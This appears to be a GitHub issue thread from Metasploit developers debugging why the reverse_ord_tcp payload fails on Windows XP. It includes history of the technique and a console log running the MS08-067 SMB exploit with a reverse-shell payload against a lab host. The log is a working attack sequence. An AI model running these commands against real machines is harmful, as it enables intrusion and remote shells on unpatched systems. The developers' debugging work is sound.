Open bwatters-r7 opened 2 years ago
Hi!
This issue has been left open with no activity for a while now.
We get a lot of issues, so we currently close issues after 60 days of inactivity. It’s been at least 30 days since the last update here. If we missed this issue or if you want to keep it open, please reply here. You can also add the label "not stale" to keep this issue open!
As a friendly reminder: the best way to see this issue, or any other, fixed is to open a Pull Request.
[*] 10.5.132.115:445 - Selected Target: Windows XP SP3 English (AlwaysOn NX)
That likely isn't going to end well, given that the payload suggests No NX or Win7
.
Although confusingly the documentation later uses a Windows XP SP2 target with AlwaysOn NX
:
This payload was designed during the Windows XP SP2 era. Apparently it was a rockin Windows payload in 2005. Perhaps this stopped working in the Windows XP SP3 / Windows 7 era?
I'm not entirely clear on the use case on this payload type- is it just the size?
You can find some details in the slides from "Beyond EIP" (pages 14 to 16) presented at BlackHat Briefings by spoonm and skape in 2005.
These payloads use a technique discussed in Oded Horovitz's lightning talk at CanSecWest/core04. I wasn't able to find details about the lightning talk, but Matt Conover and Oded Horovitz presented "Reliably Exploiting Windows Heap Overflows" at core04, so perhaps the technique was discussed during the presentation. Matt and Oded presented a bunch of heap exploitation related work for Windows 2000 to Windows XP SP2 in 2004/2005.
As you suggest, the primary benefit is the size due to leveraging in-memory WS2_32.dll
. Apparently the technique also works on Windows 9x systems. Static addresses are nice too.
For what it is worth, this payload failed on Windows XP SP0 for me too.
msf6 > use exploit/windows/smb/ms08_067_netapi
[*] Using configured payload windows/shell/reverse_tcp
msf6 exploit(windows/smb/ms08_067_netapi) > show targets
Exploit targets:
Id Name
-- ----
0 Automatic Targeting
1 Windows 2000 Universal
2 Windows XP SP0/SP1 Universal
3 Windows 2003 SP0 Universal
4 Windows XP SP2 English (AlwaysOn NX)
5 Windows XP SP2 English (NX)
6 Windows XP SP3 English (AlwaysOn NX)
7 Windows XP SP3 English (NX)
[...]
msf6 exploit(windows/smb/ms08_067_netapi) > set target 2
target => 2
msf6 exploit(windows/smb/ms08_067_netapi) > set payload windows/shell/reverse_ord_tcp
payload => windows/shell/reverse_ord_tcp
msf6 exploit(windows/smb/ms08_067_netapi) > set lhost 192.168.200.130
lhost => 192.168.200.130
msf6 exploit(windows/smb/ms08_067_netapi) > set rhosts 192.168.200.212
rhosts => 192.168.200.212
msf6 exploit(windows/smb/ms08_067_netapi) > check
[+] 192.168.200.212:445 - The target is vulnerable.
msf6 exploit(windows/smb/ms08_067_netapi) > run
[*] Started reverse TCP handler on 192.168.200.130:4444
[*] 192.168.200.212:445 - Attempting to trigger the vulnerability...
[*] Encoded stage with x86/shikata_ga_nai
[*] Sending encoded stage (267 bytes) to 192.168.200.212
[-] Command shell session 1 is not valid and will be closed
[*] 192.168.200.212 - Command shell session 1 closed.
^C[*] Exploit completed, but no session was created.
msf6 exploit(windows/smb/ms08_067_netapi) > set target 0
target => 0
msf6 exploit(windows/smb/ms08_067_netapi) > run
[*] Started reverse TCP handler on 192.168.200.130:4444
[*] 192.168.200.212:445 - Automatically detecting the target...
[*] 192.168.200.212:445 - Fingerprint: Windows XP - Service Pack 0 / 1 - lang:English
[*] 192.168.200.212:445 - Selected Target: Windows XP SP0/SP1 Universal
[*] 192.168.200.212:445 - Attempting to trigger the vulnerability...
[*] Encoded stage with x86/shikata_ga_nai
[*] Sending encoded stage (267 bytes) to 192.168.200.212
[-] Command shell session 2 is not valid and will be closed
[*] 192.168.200.212 - Command shell session 2 closed.
Based on the documentation here: https://github.com/rapid7/metasploit-framework/blob/master/documentation/modules/payload/windows/shell/reverse_ord_tcp.md I should be doing this right, but the result is no session, and a crashed smb service:
Success if I just use reverse_tcp:
I'm not entirely clear on the use case on this payload type- is it just the size?